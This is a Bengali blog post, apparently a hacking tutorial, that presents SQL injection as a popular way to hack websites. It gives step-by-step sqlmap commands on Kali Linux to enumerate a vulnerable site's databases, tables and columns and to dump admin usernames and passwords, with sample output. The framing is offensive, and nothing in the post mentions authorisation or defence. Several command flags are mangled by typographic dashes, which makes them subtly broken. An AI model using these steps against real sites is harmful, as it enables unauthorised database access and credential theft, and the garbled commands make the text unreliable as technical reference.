ওয়েবসাইট হ্যাকিং এর অন্যতম জনপ্রিয় পদ্ধতি, SQL Injection !

0
704

ওয়েবসাইট হ্যাকিং এর অন্যতম জনপ্রিয় পদ্ধতি হল SQL Injection !

আজকে আপনাদের দেখাবো Sqlmap এর কাজ ! যা কালি লিনাক্সে আগে থেকেই বিদ্যমান !কোনো সাইট  SQL Injection এর যোগ্য কিনা তা জানতে Windows এর জন্য Nessus , Vega , Acunetix ব্যাবহার করতে পারেন ! সফটওয়্যার গুলু Google A Search দিলে পাবেন !

Kali Linux এর ক্ষেত্রে Vega,Power Fuzzar ব্যাবহার করতে পারেন !

আচ্ছা ধরেন আপনি একটা ওয়েবসাইট পাইছেন যেটা SQL Injection  এর যোগ্য ! ঊপরের সফটওয়্যার গুলু বলে দিবে আপনাকে যে ঐ ওয়েবসাইট এর কোন লিঙ্কটা Vulnerable !

তাহলে ঐ ওয়েবসাইট এর Link টা হবে এমন : www.yoursite.com/index.php?id=32 !

এখন আপনার কাজ হল কালি লিনাক্স ওপেন করে  টার্মিনাল ওপেন করা ! প্রথমে আমরা ডাটাবেস বের করব তারপর টেবিল তারপর কলাম তারপর সেগুলু দেখব ডাম্প করার মাধ্যমে !

images ওয়েবসাইট হ্যাকিং এর অন্যতম জনপ্রিয় পদ্ধতি, SQL Injection !

তাহলে আমরা টার্মিনালে লিখবঃ    sqlmap -u www.yoursite.com/index.php?id=32–dbs

তারপর

আপনার কাছে কিছু জানতে চাইতে পারে ! ভালভাবে পড়ে দেখুন কি জানতে চাচ্ছে ! যদি না বুঝেন সমস্যা নাই ! লাইন এর লাস্টে দেখুন (Y/n) অথবা (y/N) এমন আসবে ! যেটা বড় হাতের হবে সেটা লিখুন !

উদাহরন ১ : Scan all directory (Y/n) Y  বড় হাতের তাহলে Y লিখে  Enter চাপুন !

উদাহরন ২ : Cancle Scane (y/N) N  বড় হাতের তাহলে N লিখে  Enter চাপুন !

কিছুক্ষন কাজ হবে ! তারপর আপনার সামনে হাজির হবে ঐ ওয়েবসাইট এর ডাটাবেস !

এমন :

*information_schema

*yoursite

তারপর

আমরা টার্মিনালে লিখবঃ

sqlmap -u www.yoursite.com/index.php?id=32 -D yoursite –tables

ভেঙ্গে বলতে হবে ??

টেবিল পাবো এমন :

user

files

admin

email

তারপর

আমরা টার্মিনালে লিখবঃ

sqlmap -u www.yoursite.com/index.php?id=32 -D yoursite -T admin –columns

কলাম পাবো এমন :

admin_username

admin_password

তারপর

আমরা টার্মিনালে লিখবঃ

sqlmap -u www.yoursite.com/index.php?id=32 -D yoursite -T admin -C admin_username –dump

[            Username        ]

[                                   ]

[             BOLOD           ]

[                                  ]

[___________________]

একই ভাবে পাসওয়ার্ড বের করব :

আমরা টার্মিনালে লিখবঃ

sqlmap -u www.yoursite.com/index.php?id=32 -D yoursite -T admin -C admin_password –dump

[            Password         ]

[                                   ]

[             123456           ]

[                                   ]

[___________________]

কারো প্রশ্ন থাকলে করতে পারেন ! আর অনেকেই বলবেন হাভিঝ দিয়ে ইজি ! কিন্তু হাভিঝ দিয়ে অনেক সাইট এর ডাটাবেস আসে না ঝামেলা করে !

একটি উত্তর ত্যাগ